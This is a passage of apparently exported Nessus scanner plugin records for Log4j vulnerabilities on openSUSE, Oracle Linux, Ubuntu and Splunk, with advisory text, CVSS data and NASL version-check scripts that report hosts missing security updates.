script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kafka-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'kafka-kit-2.1.0-bp153.2.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kafka-source-2.1.0-bp153.2.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if 
(rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kafka-kit / kafka-source');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:11:36", "description": "The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2022-9056 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : log4j (ELSA-2022-9056)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:log4j", "p-cpe:/a:oracle:linux:log4j-javadoc", "p-cpe:/a:oracle:linux:log4j-manual"], "id": "ORACLELINUX_ELSA-2022-9056.NASL", "href": "https://www.tenable.com/plugins/nessus/157137", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2022-9056.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157137);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n\n script_name(english:\"Oracle Linux 6 : log4j (ELSA-2022-9056)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2022-9056 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2022-9056.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-javadoc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-manual\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'log4j-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = 
package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:08:14", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 host has a package installed that is affected by a vulnerability as referenced in the USN-5223-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-13T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:21.04", "cpe:/o:canonical:ubuntu_linux:21.10", "p-cpe:/a:canonical:ubuntu_linux:liblog4j1.2-java"], "id": "UBUNTU_USN-5223-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156712", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5223-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156712);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"USN\", value:\"5223-1\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 host has a package installed that is affected by a vulnerability\nas referenced in the USN-5223-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5223-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j1.2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j1.2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022 Canonical, Inc. 
/ NASL script (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04|21\\.04|21\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04 / 21.04 / 21.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-8+deb10u1ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-9ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-10ubuntu0.21.04.1'},\n {'osver': '21.10', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-10ubuntu0.21.10.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j1.2-java');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T01:41:17", "description": "According to its self-reported version number, the version of Splunk running on the remote web server is Splunk Enterprise 8.1.x prior to 8.1.7.2 or 8.2.x prior to 8.2.3.3. It may, therefore, be affected by the following vulnerabilities related to the use of Log4j, as follows:\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. 
Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-02-25T00:00:00", "type": "nessus", "title": "Splunk Enterprise 8.1.x < 8.1.7.2 / 8.2.x < 8.2.3.3 Log4j", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:splunk:splunk"], "id": "SPLUNK_824.NASL", "href": "https://www.tenable.com/plugins/nessus/158383", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158383);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/03\");\n\n script_cve_id(\"CVE-2021-44228\", \"CVE-2021-45046\");\n script_xref(name:\"IAVA\", value:\"2022-A-0093\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"Splunk Enterprise 8.1.x < 8.1.7.2 / 8.2.x < 8.2.3.3 Log4j\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on a remote web server host may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Splunk running on the remote web server is Splunk\nEnterprise 8.1.x prior to 8.1.7.2 or 8.2.x prior to 8.2.3.3. 
It may, therefore, be affected by the following\nvulnerabilities related to the use of Log4j, as follows:\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI\n features used in configuration, log messages, and parameters do not protect against attacker controlled\n LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters\n can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From\n log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3,\n and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to\n log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain\n non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input\n data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. 
Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56494a5c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Splunk Enterprise to version 8.1.7.2, 8.2.3.2, 8.2.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"splunkd_detect.nasl\", \"splunk_web_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Splunk\");\n script_require_ports(\"Services/www\", 8089, 8000);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar os = get_kb_item('Host/OS');\nif ('windows' >< tolower(os))\n audit(AUDIT_HOST_NOT, 'vulnerable as it is running Windows.');\n\nvar app = 'Splunk';\nvar port = get_http_port(default:8000, embedded:TRUE);\n\nvar app_info = vcf::get_app_info(app:app, port:port);\n\n# Only 8.1 and 8.2 can be vulnerable - audit out definitively if it's not this version before checking for paranoia\nif (app_info['version'] !~ \"^8\\.[12]([^0-9]|$)\")\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n\nif (app_info['License'] == 'Enterprise')\n{\n var constraints = [\n { 'min_version' : '8.1', 'fixed_version' : '8.1.7.2' },\n { 'min_version' : '8.2', 'fixed_version' : '8.2.3.3', 'fixed_display' : '8.2.3.3 / 8.2.4' }\n ];\n}\n# Other license or no license, report not vulnerable\nelse {\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n}\n\n# Not checking for the vulnerable DFS configuration, so require paranoia\nif (report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info['version'], port);\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T21:40:57", "description": "The version of Apache Log4j on the remote host is 2.x < 2.12.2 / 2.16.0. It is, therefore, affected by a remote code execution vulnerability. The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. 
This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "Apache Log4